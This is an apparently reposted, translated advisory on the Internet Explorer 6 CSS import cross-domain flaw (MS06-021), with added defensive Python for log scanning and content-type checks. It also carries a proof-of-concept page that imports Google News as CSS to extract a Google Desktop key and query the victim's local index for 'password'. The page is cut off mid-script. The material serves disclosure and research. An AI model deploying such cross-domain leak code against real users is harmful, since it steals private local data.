
Microsoft Internet Explorer CSS Import Cross-Domain Restriction Bypass Vulnerability (MS06-021)

Source: Internet   Author: 西部数码   Date: 2008-04-09

Published: 2005-12-01
Updated: 2006-06-13

Affected systems:
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Description:
BUGTRAQ ID: 15660
CVE(CAN) ID: CVE-2005-4089

Microsoft Internet Explorer is the widely used web browser published by Microsoft.

Internet Explorer has a vulnerability in the way it handles CSS files; a remote attacker could exploit it to obtain sensitive user information.

Internet Explorer does not validate the content it imports as CSS, so a document that is not a valid style sheet is still parsed and imported. A page can therefore import the HTML and script code of a remote site as a style sheet, and an attacker can read sensitive information out of the imported text.

<*Source: Matan Gillon (matan@hacker.co.il)

Links: http://www.hacker.co.il/security/ie/css_import.html
http://secunia.com/advisories/17564/print/
http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>
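Two defender-side checks for the behaviour this advisory describes, added here as example code that is not part of the advisory or of the proof of concept: a scan of web-server access logs for the brace-injected query that the test method below relies on, and the content-type rule that current browsers (and X-Content-Type-Options: nosniff) apply to style imports in place of the IE behaviour described above. It assumes the "combined" access-log format; the log lines and header values are constructed.

```python
# Added defender-side checks for the CSS-import leak in this advisory (example
# code, not from the advisory or the PoC). Assumptions: "combined" access-log
# format; the log lines and header values below are constructed samples.
import re
from urllib.parse import urlsplit, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample: the first line mirrors the PoC's news query with "}{" injected
# (URL-encoded as %7D%7B) and a third-party Referer; the second is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2005:10:00:01 +0000] "GET /news?hl=en&ned=us&q=%7D%7B HTTP/1.1" '
    '200 5120 "http://third-party.example/poc.html" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.9 - - [01/Dec/2005:10:00:02 +0000] "GET /news?hl=en&q=election HTTP/1.1" '
    '200 4096 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
]

def find_brace_injection(log_lines):
    """Return (ip, target, referer) for requests whose decoded query string carries a
    curly brace. The PoC injects "}{" so IE's lenient CSS parser exposes the surrounding
    HTML as a rule body; braces are uncommon in real queries, so review each hit's Referer."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip it
        query = urlsplit(m.group("target")).query
        if any(ch in unquote_plus(query) for ch in "{}"):
            hits.append((m.group("ip"), m.group("target"), m.group("referer")))
    return hits

def stylesheet_accepted(content_type, same_origin, quirks_mode, nosniff):
    """Whether a browser following the HTML/Fetch rules that replaced the behaviour in
    this advisory parses a response as a style sheet: only text/css is accepted, except
    a same-origin sheet in quirks mode, and X-Content-Type-Options: nosniff removes even
    that exception. Pre-MS06-021 IE6 parsed any response, hence the cross-domain leak."""
    essence = content_type.split(";", 1)[0].strip().lower()   # drop charset etc.
    if essence == "text/css":
        return True
    if nosniff:
        return False
    return same_origin and quirks_mode

if __name__ == "__main__":
    for ip, target, referer in find_brace_injection(SAMPLE_LOG):
        print(f"brace injection from {ip}: {target} (Referer: {referer})")
```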

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

<html>
<head>

<!--
Google Desktop Exploit proof of concept by Matan Gillon

This page is a proof of concept for the CSSXSS attack discussed
at:
http://www.hacker.co.il/security/ie/css_import.html

It shows how using a few simple CSS imports an attacker can
run queries and return the results on a machine that has Google Desktop
v2 installed. This exploit runs only on IE or IE derived browsers.

This is how it's done in a nutshell:
1) Import the google news page as CSS with the query "}{".
2) Extract the GDS key from the import results using a regular expression.
3) Run another CSS import that executes a query for the word "password"
on the local GDS server.
4) Wait 5 seconds for the page to load and show the result.

This proof of concept code is supplied for educational purposes only.
-->

<title>hacker.co.il - Google Desktop Exploit</title>

<style type="text/css">
/*
Import the google news page, the GDS link with the secret key should be
retrieved by this. The query injects curly braces characters so the
link will be visible after the IE CSS parsing.
*/

@import url("http://news.google.com/news?hl=en&ned=us&q=}{");

</style>

</head>

<body>

<h2>Google Desktop Exploit proof of concept</h2>

<p>
Mangled HTML code returned from Google News by a CSS import (note the 127.0.0.1 desktop link):<br>
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>

<p>
Google Desktop key parsed from the code above:<br>

<input type="text" size="50" id="gdskey">

<p>
Results returned from local Google Desktop for the word "password" in raw HTML after CSS parsing:<br>
<textarea rows="20" cols="80" id="gdsresult">Please wait while getting results</textarea>

<p>
The original Google Desktop result page from the local machine:<br>

<iframe width="620" height="300" id="gdspage"></iframe>

<p>
<a href="http://www.hacker.co.il/security/ie/css_import.html">Back to article at hacker.co.il</a>

<script>

// This will show the results of the query on google desktop
function showResults()
{
document.getElementById("gdsresult").innerText = document.styleSheets(0).imports(1).cssText;
}

// Show the CSS parsed HTML source of the Google News import
document.getElementById("gnewsssrc").innerText = document.styleSheets(0).imports(0).cssText;

// A regular expression that parses the key out of the CSS import result
var re = new RegExp("127.0.0.1:4664/search&s=(. ?)\?q");
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);

if (reRes)
{
// Show the parsed key
document.getElementById("gdskey").innerText = reRes[1];

// Combine the valid key with the local server address and add a password query to the URL
